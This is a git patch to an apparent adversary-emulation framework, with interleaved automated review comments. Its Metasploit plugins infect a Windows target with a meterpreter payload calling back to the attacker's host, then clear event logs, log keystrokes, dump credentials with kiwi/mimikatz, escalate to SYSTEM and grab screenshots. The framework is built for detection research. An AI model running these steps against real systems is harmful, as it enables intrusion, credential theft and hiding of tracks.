From ac482e8b9e0e5fe8f204734d1102913b1a43345a Mon Sep 17 00:00:00 2001 From: Thorsten Sick Date: Wed, 13 Oct 2021 16:25:46 +0200 Subject: [PATCH] Fixed several issues in metasploit attacks --- app/metasploit.py | 112 ++++++++++++++---- .../metasploit_clearev_t1070.py | 21 ++-- .../metasploit_getsystem.py | 33 +++--- .../metasploit_getuid.py | 4 +- .../metasploit_keylogging.py | 14 +-- .../metasploit_kiwi_t1003.py | 34 +++--- .../metasploit_migrate.py | 13 +- .../metasploit_ps_t1057/metasploit_ps.py | 13 +- .../metasploit_screengrab.py | 23 ++-- .../metasploit_sysinfo.py | 21 ++-- 10 files changed, 164 insertions(+), 124 deletions(-) diff --git a/app/metasploit.py b/app/metasploit.py index 0985ba1..d3a12b0 100644 --- a/app/metasploit.py +++ b/app/metasploit.py 
@@ -600,29 +600,41 @@ Elevate privileges from local administrator to SYSTEM. Three ways to do that wil result=res) return res - def clearev(self, target): + def clearev(self, target, **kwargs): """ Clears windows event logs """ command = "clearev" ttp = "T1070.001" # It uses one out of three different ways to elevate privileges. + tactics = "Defense Evasion" + tactics_id = "TA0005" + description = """ +Clear windows event logs to hide tracks + """ self.attack_logger.vprint( f"{CommandlineColors.OKCYAN}Execute {command} through meterpreter{CommandlineColors.ENDC}", 1) - self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(), - target=target.get_ip(), - metasploit_command=command, - ttp=ttp) + logid = self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(), + target=target.get_ip(), + metasploit_command=command, + ttp=ttp, + name="clearev", + description=description, + tactics=tactics, + tactics_id=tactics_id, + situation_description=kwargs.get("situation_description", None), + countermeasure=kwargs.get("countermeasure", None)) res = self.meterpreter_execute_on([command], target) print(res) self.attack_logger.stop_metasploit_attack(source=self.attacker.get_ip(), target=target.get_ip(), metasploit_command=command, ttp=ttp, + logid=logid, result=res) return res - def screengrab(self, target): + def screengrab(self, target, **kwargs): """ Creates a screenshot Before using it, migrate to a process running while you want to monitor. 
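Review bot: The new `**kwargs` on `clearev` silently accepts and discards any misspelled or unsupported keyword (a caller writing `counter_measure=` gets no error, just a `None` countermeasure in the attack log), and the docstring does not mention the two keys the method actually reads. Prefer explicit keyword-only parameters, `def clearev(self, target, *, situation_description=None, countermeasure=None):`, passed straight through to `start_metasploit_attack`, which also removes the redundant `kwargs.get(..., None)` defaults and makes the docstring's `@param` lines straightforward to add. The same pattern is introduced in the screengrab, keylogging, getuid and sysinfo hunks below. The `description` strings would read better as plain one-line literals; as written the triple-quoted form carries a leading newline and the closing line's indentation into the logged text. The enclosing class continues outside the hunk.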
@@ -631,14 +643,25 @@ Elevate privileges from local administrator to SYSTEM. Three ways to do that wil command = "screengrab" ttp = "T1113" # It uses one out of three different ways to elevate privileges. + tactics = "Collection" + tactics_id = "TA0009" + description = """ +Do screen grabbing to collect data on target + """ self.attack_logger.vprint( f"{CommandlineColors.OKCYAN}Execute {command} through meterpreter{CommandlineColors.ENDC}", 1) - self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(), - target=target.get_ip(), - metasploit_command=command, - ttp=ttp) + logid = self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(), + target=target.get_ip(), + metasploit_command=command, + ttp=ttp, + name="screengrab", + description=description, + tactics=tactics, + tactics_id=tactics_id, + situation_description=kwargs.get("situation_description", None), + countermeasure=kwargs.get("countermeasure", None)) res = self.meterpreter_execute_on(["use espia"], target) print(res) res = self.meterpreter_execute_on([command], target) @@ -647,10 +670,11 @@ Elevate privileges from local administrator to SYSTEM. Three ways to do that wil target=target.get_ip(), metasploit_command=command, ttp=ttp, + logid=logid, result=res) return res - def keylogging(self, target, monitoring_time): + def keylogging(self, target, monitoring_time, **kwargs): """ Starts keylogging Before using it, migrate to a process running while you want to monitor. 
@@ -658,19 +682,29 @@ Elevate privileges from local administrator to SYSTEM. Three ways to do that wil "winlogon.exe" will monitor user logins. "explorer.exe" during the session. @param monitoring_time: Seconds the keylogger is running - @param monitoring_time: The time to monitor the keys. In seconds """ command = "keyscan_start" ttp = "T1056.001" # It uses one out of three different ways to elevate privileges. + tactics = "Collection" + tactics_id = "TA0009" + description = """ +Log keys to get passwords and other credentials + """ self.attack_logger.vprint( f"{CommandlineColors.OKCYAN}Execute {command} through meterpreter{CommandlineColors.ENDC}", 1) - self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(), - target=target.get_ip(), - metasploit_command=command, - ttp=ttp) + logid = self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(), + target=target.get_ip(), + metasploit_command=command, + ttp=ttp, + name="keylogging", + description=description, + tactics=tactics, + tactics_id=tactics_id, + situation_description=kwargs.get("situation_description", None), + countermeasure=kwargs.get("countermeasure", None)) res = self.meterpreter_execute_on([command], target) print(res) time.sleep(monitoring_time) 
@@ -680,54 +714,80 @@ Elevate privileges from local administrator to SYSTEM. Three ways to do that wil target=target.get_ip(), metasploit_command=command, ttp=ttp, + logid=logid, result=res) return res - def getuid(self, target): + def getuid(self, target, **kwargs): """ Returns the UID """ command = "getuid" ttp = "T1056.001" # It uses one out of three different ways to elevate privileges. + tactics = "Collection" + tactics_id = "TA0009" + description = """ +Get user id + """ self.attack_logger.vprint( f"{CommandlineColors.OKCYAN}Execute {command} through meterpreter{CommandlineColors.ENDC}", 1) - self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(), - target=target.get_ip(), - metasploit_command=command, - ttp=ttp) + logid = self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(), + target=target.get_ip(), + metasploit_command=command, + ttp=ttp, + name="getuid", + description=description, + tactics=tactics, + tactics_id=tactics_id, + situation_description=kwargs.get("situation_description", None), + countermeasure=kwargs.get("countermeasure", None)) res = self.meterpreter_execute_on([command], target) self.attack_logger.stop_metasploit_attack(source=self.attacker.get_ip(), target=target.get_ip(), metasploit_command=command, ttp=ttp, + logid=logid, result=res) + return res[0] - def sysinfo(self, target): + def sysinfo(self, target, **kwargs): """ Returns the sysinfo """ command = "sysinfo" ttp = "T1082" # It uses one out of three different ways to elevate privileges. 
+ tactics = "Discovery" + tactics_id = "TA0007" + description = """ +Get basic system information + """ self.attack_logger.vprint( f"{CommandlineColors.OKCYAN}Execute {command} through meterpreter{CommandlineColors.ENDC}", 1) - self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(), - target=target.get_ip(), - metasploit_command=command, - ttp=ttp) + logid = self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(), + target=target.get_ip(), + metasploit_command=command, + ttp=ttp, + name="sysinfo", + description=description, + tactics=tactics, + tactics_id=tactics_id, + situation_description=kwargs.get("situation_description", None), + countermeasure=kwargs.get("countermeasure", None)) res = self.meterpreter_execute_on([command], target) self.attack_logger.stop_metasploit_attack(source=self.attacker.get_ip(), target=target.get_ip(), metasploit_command=command, ttp=ttp, + logid=logid, result=res) return res[0] diff --git a/plugins/default/metasploit_attacks/metasploit_clearev_t1070/metasploit_clearev_t1070.py b/plugins/default/metasploit_attacks/metasploit_clearev_t1070/metasploit_clearev_t1070.py index 9ef0b5f..f9e1808 100644 --- a/plugins/default/metasploit_attacks/metasploit_clearev_t1070/metasploit_clearev_t1070.py +++ b/plugins/default/metasploit_attacks/metasploit_clearev_t1070/metasploit_clearev_t1070.py @@ -2,7 +2,7 @@ # A plugin to nmap targets slow motion, to evade sensors -from plugins.base.attack import AttackPlugin +from plugins.base.attack import AttackPlugin, Requirement from app.metasploit import MetasploitInstant @@ -16,6 +16,8 @@ class MetasploitClearevPlugin(AttackPlugin): required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share + requirements = [Requirement.METASPLOIT] + def __init__(self): super().__init__() self.plugin_path = __file__ 
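Review bot: The tactic metadata added to `getuid` mislabels the step: `tactics = "Collection"` and `tactics_id = "TA0009"`, next to the pre-existing `ttp = "T1056.001"` (input capture / keylogging), describe a collection technique, whereas `getuid` is user discovery — the plugin directory is already named `metasploit_getuid_t1033`, and the sibling `sysinfo` hunk uses the matching `tactics = "Discovery"` / `tactics_id = "TA0007"`. Since these fields feed the attack log that defenders map against ATT&CK, this step would be filed under the wrong tactic; change the three lines to `ttp = "T1033"`, `tactics = "Discovery"`, `tactics_id = "TA0007"`. The comment `# It uses one out of three different ways to elevate privileges.` carried on each `ttp` line in this file belongs only to getsystem and should be dropped from the clearev, screengrab, keylogging, getuid and sysinfo copies. The `print(res)` debugging output left in the clearev, screengrab and keylogging bodies should go through `self.attack_logger.vprint` like the surrounding code.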
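Review bot: After this patch the `MetasploitInstant` import in `metasploit_clearev_t1070.py` is dead: the later hunk of this file replaces the local `MetasploitInstant(...)` construction with `self.metasploit`, so only `Requirement` is still referenced and a linter will flag the unused name. The same leftover import remains in the getsystem, keylogging, kiwi, migrate, ps, screengrab and sysinfo plugins; getuid is the exception, since its `run` body is not touched here. Reduce each to `from plugins.base.attack import AttackPlugin, Requirement` (and drop the now-unused `MetasploitInstant` line). The header comment `# A plugin to nmap targets slow motion, to evade sensors` kept as context in every one of these files describes a different plugin and is worth replacing with a one-line summary of the meterpreter step each file actually performs.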
@@ -31,17 +33,12 @@ class MetasploitClearevPlugin(AttackPlugin): payload_name = "babymetal.exe" target = self.targets[0] - metasploit = MetasploitInstant(self.metasploit_password, - attack_logger=self.attack_logger, - attacker=self.attacker_machine_plugin, - username=self.metasploit_user) - - metasploit.smart_infect(target, - payload=payload_type, - outfile=payload_name, - format="exe", - architecture="x64") + self.metasploit.smart_infect(target, + payload=payload_type, + outfile=payload_name, + format="exe", + architecture="x64") - metasploit.clearev(target) + self.metasploit.clearev(target) return res diff --git a/plugins/default/metasploit_attacks/metasploit_getsystem/metasploit_getsystem.py b/plugins/default/metasploit_attacks/metasploit_getsystem/metasploit_getsystem.py index 8a32fc9..b5de21a 100644 --- a/plugins/default/metasploit_attacks/metasploit_getsystem/metasploit_getsystem.py +++ b/plugins/default/metasploit_attacks/metasploit_getsystem/metasploit_getsystem.py @@ -2,7 +2,7 @@ # A plugin to nmap targets slow motion, to evade sensors -from plugins.base.attack import AttackPlugin +from plugins.base.attack import AttackPlugin, Requirement from app.metasploit import MetasploitInstant import socket @@ -17,6 +17,8 @@ class MetasploitGetsystemPlugin(AttackPlugin): required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share + requirements = [Requirement.METASPLOIT] + def __init__(self): super().__init__() self.plugin_path = __file__ 
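Review bot: `self.metasploit.clearev(target)` is called without `situation_description` or `countermeasure`, so the new logging fields that the `app/metasploit.py` hunks add for this step are recorded as `None`, while the getsystem and kiwi plugins in this same patch supply both. For a tool whose output is meant to guide detection, clearing the event log is exactly the step that deserves a countermeasure line — e.g. forward event logs off-host, since the clear itself is recorded as Security event 1102 and a gap in the forwarded stream is the signal. The keylogging, ps, screengrab and sysinfo plugin hunks below have the same gap. The return value of `clearev` is also discarded and `res` is returned from an assignment outside the hunk; if the meterpreter output is meant to be reported, `res = self.metasploit.clearev(target)` would carry it, but that depends on what `run` assigns to `res` earlier.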
@@ -33,27 +35,22 @@ class MetasploitGetsystemPlugin(AttackPlugin): payload_name = "babymetal.exe" target = self.targets[0] - metasploit = MetasploitInstant(self.metasploit_password, - attack_logger=self.attack_logger, - attacker=self.attacker_machine_plugin, - username=self.metasploit_user) - ip = socket.gethostbyname(self.attacker_machine_plugin.get_ip()) - metasploit.smart_infect(target, - payload=payload_type, - architecture="x64", - platform="windows", - lhost=ip, - format="exe", - outfile=payload_name) + self.metasploit.smart_infect(target, + payload=payload_type, + architecture="x64", + platform="windows", + lhost=ip, + format="exe", + outfile=payload_name) # TODO: https://github.com/rapid7/metasploit-payloads/blob/master/c/meterpreter/source/extensions/priv/elevate.c#L70 - metasploit.getsystem(target, - variant=self.conf['variant'], - situation_description="This is an example standalone attack step. In real world attacks there would be events before and after", - countermeasure="Observe how pipes are used. Take steps before (gaining access) and after (abusing those new privileges) into account for detection." - ) + self.metasploit.getsystem(target, + variant=self.conf['variant'], + situation_description="This is an example standalone attack step. In real world attacks there would be events before and after", + countermeasure="Observe how pipes are used. Take steps before (gaining access) and after (abusing those new privileges) into account for detection." + ) return res diff --git a/plugins/default/metasploit_attacks/metasploit_getuid_t1033/metasploit_getuid.py b/plugins/default/metasploit_attacks/metasploit_getuid_t1033/metasploit_getuid.py index 3007ccb..d468e0d 100644 --- a/plugins/default/metasploit_attacks/metasploit_getuid_t1033/metasploit_getuid.py +++ b/plugins/default/metasploit_attacks/metasploit_getuid_t1033/metasploit_getuid.py 
@@ -2,7 +2,7 @@ # A plugin to nmap targets slow motion, to evade sensors -from plugins.base.attack import AttackPlugin +from plugins.base.attack import AttackPlugin, Requirement from app.metasploit import MetasploitInstant @@ -16,6 +16,8 @@ class MetasploitGetuidPlugin(AttackPlugin): required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share + requirements = [Requirement.METASPLOIT] + def __init__(self): super().__init__() self.plugin_path = __file__ diff --git a/plugins/default/metasploit_attacks/metasploit_keylogging_T1056/metasploit_keylogging.py b/plugins/default/metasploit_attacks/metasploit_keylogging_T1056/metasploit_keylogging.py index 0907804..2d43011 100644 --- a/plugins/default/metasploit_attacks/metasploit_keylogging_T1056/metasploit_keylogging.py +++ b/plugins/default/metasploit_attacks/metasploit_keylogging_T1056/metasploit_keylogging.py @@ -2,7 +2,7 @@ # A plugin to nmap targets slow motion, to evade sensors -from plugins.base.attack import AttackPlugin +from plugins.base.attack import AttackPlugin, Requirement from app.metasploit import MetasploitInstant @@ -16,6 +16,8 @@ class MetasploitKeyloggingPlugin(AttackPlugin): required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share + requirements = [Requirement.METASPLOIT] + def __init__(self): super().__init__() self.plugin_path = __file__ 
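Review bot: `metasploit_getuid.py` declares `requirements = [Requirement.METASPLOIT]` but, unlike every other plugin in this patch, its `run` body is not converted to `self.metasploit` (the diffstat lists only these four changed lines), so it presumably still constructs its own `MetasploitInstant` next to the instance the requirement provisions — two handler setups for one plugin, if that is the case. Either convert the call sites in `run` to `self.metasploit` as the other plugins do, or leave the requirement off until that is done. How `AttackPlugin` turns `Requirement.METASPLOIT` into `self.metasploit` is outside this patch and cannot be checked here; a one-line comment above the `requirements` assignment saying that the base class provides `self.metasploit` would spare the next reader the same question.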
@@ -31,19 +33,15 @@ class MetasploitKeyloggingPlugin(AttackPlugin): payload_name = "babymetal.exe" target = self.targets[0] - metasploit = MetasploitInstant(self.metasploit_password, - attack_logger=self.attack_logger, - attacker=self.attacker_machine_plugin, - username=self.metasploit_user) - metasploit.smart_infect(target, + self.metasploit.smart_infect(target, payload=payload_type, outfile=payload_name, format="exe", architecture="x64") - metasploit.migrate(target, name="winlogon.exe") + self.metasploit.migrate(target, name="winlogon.exe") - metasploit.keylogging(target, monitoring_time=20) + self.metasploit.keylogging(target, monitoring_time=20) return res diff --git a/plugins/default/metasploit_attacks/metasploit_kiwi_t1003/metasploit_kiwi_t1003.py b/plugins/default/metasploit_attacks/metasploit_kiwi_t1003/metasploit_kiwi_t1003.py index e2bef82..ae15136 100644 --- a/plugins/default/metasploit_attacks/metasploit_kiwi_t1003/metasploit_kiwi_t1003.py +++ b/plugins/default/metasploit_attacks/metasploit_kiwi_t1003/metasploit_kiwi_t1003.py @@ -2,7 +2,7 @@ # A plugin to nmap targets slow motion, to evade sensors -from plugins.base.attack import AttackPlugin +from plugins.base.attack import AttackPlugin, Requirement from app.metasploit import MetasploitInstant import socket @@ -17,6 +17,8 @@ class MetasploitKiwiPlugin(AttackPlugin): required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share + requirements = [Requirement.METASPLOIT] + def __init__(self): super().__init__() self.plugin_path = __file__ 
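Review bot: In the `smart_infect` call the changed first line now reads `self.metasploit.smart_infect(target,` while the unchanged continuation lines `payload=payload_type,` through `architecture="x64")` keep their old column, so they no longer line up with the opening parenthesis (PEP 8 hanging/visual indent); the screengrab and sysinfo hunks re-indent the whole call, and this file should match them. The migrate and ps hunks have the same misalignment. Running the project's formatter over the three files resolves it without further hand edits. The rest of `run` lies outside the hunk.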
@@ -33,25 +35,21 @@ class MetasploitKiwiPlugin(AttackPlugin): payload_name = "babymetal.exe" target = self.targets[0] - metasploit = MetasploitInstant(self.metasploit_password, - attack_logger=self.attack_logger, - attacker=self.attacker_machine_plugin, - username=self.metasploit_user) ip = socket.gethostbyname(self.attacker_machine_plugin.get_ip()) - metasploit.smart_infect(target, - payload=payload_type, - architecture="x64", - platform="windows", - lhost=ip, - format="exe", - outfile=payload_name) - - metasploit.kiwi(target, - variant=self.conf['variant'], - situation_description="Kiwi is the modern version of mimikatz. It is integrated into metasploit. The attacker wants to get some credentials - reading them from memory.", - countermeasure="Memory access into critical processes should be monitored." - ) + self.metasploit.smart_infect(target, + payload=payload_type, + architecture="x64", + platform="windows", + lhost=ip, + format="exe", + outfile=payload_name) + + self.metasploit.kiwi(target, + variant=self.conf['variant'], + situation_description="Kiwi is the modern version of mimikatz. It is integrated into metasploit. The attacker wants to get some credentials - reading them from memory.", + countermeasure="Memory access into critical processes should be monitored." + ) return res diff --git a/plugins/default/metasploit_attacks/metasploit_migrate_t1055/metasploit_migrate.py b/plugins/default/metasploit_attacks/metasploit_migrate_t1055/metasploit_migrate.py index 7b29679..3e8ea5b 100644 --- a/plugins/default/metasploit_attacks/metasploit_migrate_t1055/metasploit_migrate.py +++ b/plugins/default/metasploit_attacks/metasploit_migrate_t1055/metasploit_migrate.py @@ -2,7 +2,7 @@ # A plugin to nmap targets slow motion, to evade sensors -from plugins.base.attack import AttackPlugin +from plugins.base.attack import AttackPlugin, Requirement from app.metasploit import MetasploitInstant import socket 
@@ -17,6 +17,8 @@ class MetasploitMigratePlugin(AttackPlugin): required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share + requirements = [Requirement.METASPLOIT] + def __init__(self): super().__init__() self.plugin_path = __file__ @@ -32,14 +34,9 @@ class MetasploitMigratePlugin(AttackPlugin): payload_name = "babymetal.exe" target = self.targets[0] - metasploit = MetasploitInstant(self.metasploit_password, - attack_logger=self.attack_logger, - attacker=self.attacker_machine_plugin, - username=self.metasploit_user) - ip = socket.gethostbyname(self.attacker_machine_plugin.get_ip()) - metasploit.smart_infect(target, + self.metasploit.smart_infect(target, payload=payload_type, architecture="x64", platform="windows", @@ -48,6 +45,6 @@ class MetasploitMigratePlugin(AttackPlugin): outfile=payload_name ) - metasploit.migrate(target, user="NT AUTHORITY\\SYSTEM", name="svchost.exe", arch="x64") + self.metasploit.migrate(target, user="NT AUTHORITY\\SYSTEM", name="svchost.exe", arch="x64") return res diff --git a/plugins/default/metasploit_attacks/metasploit_ps_t1057/metasploit_ps.py b/plugins/default/metasploit_attacks/metasploit_ps_t1057/metasploit_ps.py index bef5798..4c4ae46 100644 --- a/plugins/default/metasploit_attacks/metasploit_ps_t1057/metasploit_ps.py +++ b/plugins/default/metasploit_attacks/metasploit_ps_t1057/metasploit_ps.py @@ -2,7 +2,7 @@ # A plugin to nmap targets slow motion, to evade sensors -from plugins.base.attack import AttackPlugin +from plugins.base.attack import AttackPlugin, Requirement from app.metasploit import MetasploitInstant @@ -16,6 +16,8 @@ class MetasploitPsPlugin(AttackPlugin): required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share + requirements = [Requirement.METASPLOIT] + def __init__(self): super().__init__() self.plugin_path = __file__ 
@@ -31,17 +33,12 @@ class MetasploitPsPlugin(AttackPlugin): payload_name = "babymetal.exe" target = self.targets[0] - metasploit = MetasploitInstant(self.metasploit_password, - attack_logger=self.attack_logger, - attacker=self.attacker_machine_plugin, - username=self.metasploit_user) - - metasploit.smart_infect(target, + self.metasploit.smart_infect(target, payload=payload_type, outfile=payload_name, format="exe", architecture="x64") - metasploit.ps_process_discovery(target) + self.metasploit.ps_process_discovery(target) return res diff --git a/plugins/default/metasploit_attacks/metasploit_screengrab_t1113/metasploit_screengrab.py b/plugins/default/metasploit_attacks/metasploit_screengrab_t1113/metasploit_screengrab.py index a1856e6..8344a21 100644 --- a/plugins/default/metasploit_attacks/metasploit_screengrab_t1113/metasploit_screengrab.py +++ b/plugins/default/metasploit_attacks/metasploit_screengrab_t1113/metasploit_screengrab.py @@ -2,7 +2,7 @@ # A plugin to nmap targets slow motion, to evade sensors -from plugins.base.attack import AttackPlugin +from plugins.base.attack import AttackPlugin, Requirement from app.metasploit import MetasploitInstant @@ -16,6 +16,8 @@ class MetasploitScreengrabPlugin(AttackPlugin): required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share + requirements = [Requirement.METASPLOIT] + def __init__(self): super().__init__() self.plugin_path = __file__ 
@@ -31,19 +33,14 @@ class MetasploitScreengrabPlugin(AttackPlugin): payload_name = "babymetal.exe" target = self.targets[0] - metasploit = MetasploitInstant(self.metasploit_password, - attack_logger=self.attack_logger, - attacker=self.attacker_machine_plugin, - username=self.metasploit_user) - - metasploit.smart_infect(target, - payload=payload_type, - outfile=payload_name, - format="exe", - architecture="x64") + self.metasploit.smart_infect(target, + payload=payload_type, + outfile=payload_name, + format="exe", + architecture="x64") - metasploit.migrate(target, user="NT AUTHORITY\\SYSTEM") + self.metasploit.migrate(target, user="NT AUTHORITY\\SYSTEM") - metasploit.screengrab(target) + self.metasploit.screengrab(target) return res diff --git a/plugins/default/metasploit_attacks/metasploit_sysinfo_t1082/metasploit_sysinfo.py b/plugins/default/metasploit_attacks/metasploit_sysinfo_t1082/metasploit_sysinfo.py index 29ff19f..4a00ab8 100644 --- a/plugins/default/metasploit_attacks/metasploit_sysinfo_t1082/metasploit_sysinfo.py +++ b/plugins/default/metasploit_attacks/metasploit_sysinfo_t1082/metasploit_sysinfo.py @@ -2,7 +2,7 @@ # A plugin to nmap targets slow motion, to evade sensors -from plugins.base.attack import AttackPlugin +from plugins.base.attack import AttackPlugin, Requirement from app.metasploit import MetasploitInstant @@ -16,6 +16,8 @@ class MetasploitSysinfoPlugin(AttackPlugin): required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share + requirements = [Requirement.METASPLOIT] + def __init__(self): super().__init__() self.plugin_path = __file__ 
@@ -31,18 +33,13 @@ class MetasploitSysinfoPlugin(AttackPlugin): payload_name = "babymetal.exe" target = self.targets[0] - metasploit = MetasploitInstant(self.metasploit_password, - attack_logger=self.attack_logger, - attacker=self.attacker_machine_plugin, - username=self.metasploit_user) - - metasploit.smart_infect(target, - payload=payload_type, - outfile=payload_name, - format="exe", - architecture="x64") + self.metasploit.smart_infect(target, + payload=payload_type, + outfile=payload_name, + format="exe", + architecture="x64") - si = metasploit.sysinfo(target) + si = self.metasploit.sysinfo(target) print(f"Sysinfo: {si}") return res